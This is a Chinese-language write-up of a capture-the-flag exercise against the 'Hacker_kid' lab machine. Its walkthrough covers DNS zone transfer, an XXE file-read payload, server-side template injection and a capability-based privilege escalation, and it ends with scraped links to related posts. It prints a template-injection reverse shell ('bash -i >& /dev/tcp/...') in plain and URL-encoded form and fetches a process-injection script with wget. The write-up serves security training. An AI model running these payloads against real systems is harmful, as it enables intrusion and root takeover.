Hacker_kid靶机打靶过程及思路
1.常规端口服务及侦探
2.发现9999存在python轻量级web开发框架tornado
3.怀疑udp53端口作为同一个域之间传输数据的方式,扫描发现存在udp53端口
sudo nmap -p53 -sU 10.0.2.15
- 查看网页源码,发现注释中存在page_no参数处存在get提交方法,参数爆破发现21存在回显
,发现是不同域名绑定一个ip这种dns解析服务
cve-2020-8625 cve-2021-25216 两个针对dns服务的漏洞无利用代码失败
5.在hosts更改绑定后发现主机记录没有改变,使用dns区域访问,axfr区域传输后会返回域名下的
所有记录,dig axfr @10.0.2.28 blackhat.local发现存在axfr漏洞,发现存在新域名,均绑定到hosts
里面
6.挨个访问新域名,发现hackerkid.blackhat.loacl有新内容,同时发现所有域名9999端口都存在一个
登录界面,在新界面上发现提交方式为xml,考虑是否存在xxe漏
]> 将邮箱处修改为&xxe;
发现存在漏洞并且成功读取到passwd文件,发现saket账号存疑
7.挨个读取后,在读取/home/saket/.bashrc时没有回显,使用php封装器读取,然后进行解码
,发现得到用户名和密码,在登录处登录失效,尝试使用saket作为用户名登录
8.登录进去思考发现name可能是变量,发现回显名字,思考是否存在模板注入,使用通杀模板注入payload
{{1+abcxyz}}${1+1bcxyz}%3C%1+abcxyz%%3E[acbxyz]
${77},{{77}},发现可以执行,对模板进行注入反弹操作
{% import os %}{{os.system(‘bash -c “bash -i >& /dev/tcp/10.0.2.7/4444 0>&1”’)}}
发现连接失败,对编码进行混淆绕过
%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2
Ftcp%2F10.0.2.15%2F4444%2000%3E%261%22%27%29%7D%7D
成功得到反弹shell
9.开始进行提权
基础提权方式都失败
capabilities是一个权限管理功能,设置权限赋予
setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
首先进行查询指令 /sbin/getcap getcap -r / 2>/dev/null
发现一个python2.7的程序拥有capabilities权限
ps -U root 查看所有以root账号运行的进程 或者 ps -aef | grep root
下载利用权限利用的python进程注入脚本wget https://gist.githubusercontent.com/wifisecguy/1d69839fe55c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py
python2.7 inject.py 862 默认侦听端口为5600
10.kali本机侦听端口发现注入成功,得到root权限,打靶成功
Hacker_kid靶机打靶过程及思路相关推荐
- Tre靶机打靶过程及思路
1.常规端口及服务发现 2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功 3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库 ...
- Vikings靶机打靶过程及思路
1.常规端口服务侦探 2.用gubuster进行路径爆破,发现war下war-is-over新目录 gobuster dir -r -u http://10.0.2.16/ -x txt,html,p ...
- Vegeta靶机打靶过程及思路
1.常规端口扫描及发现 2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片 3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码 4.再 ...
- 渗透测试-靶机打靶思路与方法
渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一.对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...
- 实弹打靶过程中有哪些注意事项
在室内射击场中,实弹打靶和模拟影像打靶可以有效结合,是目前智能化靶场必备的训练配套设施.在室内射击场建设中,需要预留出模拟影像打靶设备的安装位置,并且实弹打靶和模拟影像射击训练不可同时进行. 在进行实 ...
- 【深度学习】模型训练过程可视化思路(可视化工具TensorBoard)
[深度学习]模型训练过程可视化思路(可视化工具TensorBoard) 文章目录 1 TensorBoard的工作原理 2 TensorFlow中生成log文件 3 启动TensorBoard,读取l ...
- php %3c php 攻击,web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- Js黑客帝国效果 文字下落 制作过程和思路
效果预览: http://jsfiddle.net/dtdxrk/m8R6b/embedded/result/ Js黑客帝国效果 文字向下落制作过程和思路 1.css控制文字竖显示 2.动态添加div ...
最新文章
- flutter打包的app有多大_Flutter-最近搞了个项目(常用控件,第三方基本库)-底部导航,登录,启动画面,webview等...
- R语言使用lm构建线性回归模型、并将目标变量对数化实战:可视化模型预测输出与实际值对比图、可视化模型的残差、模型系数(coefficient)、模型总结信息(summary)、残差总结信息
- BTrace生产调试
- 正则化方法之DropBlock
- 07 | 案例篇:系统中出现大量不可中断进程和僵尸进程怎么办?(上)
- php最后最后再执行,php最后几个函数
- sed 和read line用法
- 浅谈JSP表单中的form传值
- e3是合法浮点数吗_下列哪些是不合法的浮点数的选项是 123 2e4.2 .e5 -e3 .234 1e3
- android 系统(85)---MAT 工具使用
- Cere Network 将于 Republic、DAO Maker 和 Polkastarter 上进行公售
- android手机安装windows系统,安卓手机原来还可以这样安装windows系统,你还不知道吗?...
- abc物动量分析计算机视频,物动量ABC分类法
- 编写吃c语言程序步骤,自己做的一个C语言小游戏——吃金子
- 食物语服务器什么时候维护,食物语更新公告
- Unity最新版打包AssetBundle和加载的方法
- R语言进行中文分词和聚类
- java 笔记本i7 i5_笔记本i7低压cpu性能抵不过i5标压cpu,为什么还叫i7
- php关键词回复源码,PHP对接公众号搜索自动回复源码
- 如何评估ASO优化方案案例推广效果,优化aso方案
热门文章
- python破解md5_python怎么使用md5加密解密
- java 1.13 快照下载_Minecraft Java快照版18w15a下载
- Oracle中有dateadd吗,oracle dateadd的函数有哪些?
- 我们应该怎样面对自己
- 4种超好用的PS调色小技巧,知道的人不多!
- python音乐相册_python爬虫之爬取网易云音乐的歌曲图片和歌词
- 我有一个计算机梦想作文500,我有一个梦想作文500字
- 解决Manifest merger failed with multiple errors方法
- hp 打印机更改 wifi direct 的密码
- 用python写一个有AI的斗地主游戏(二)——简述后端代码和思路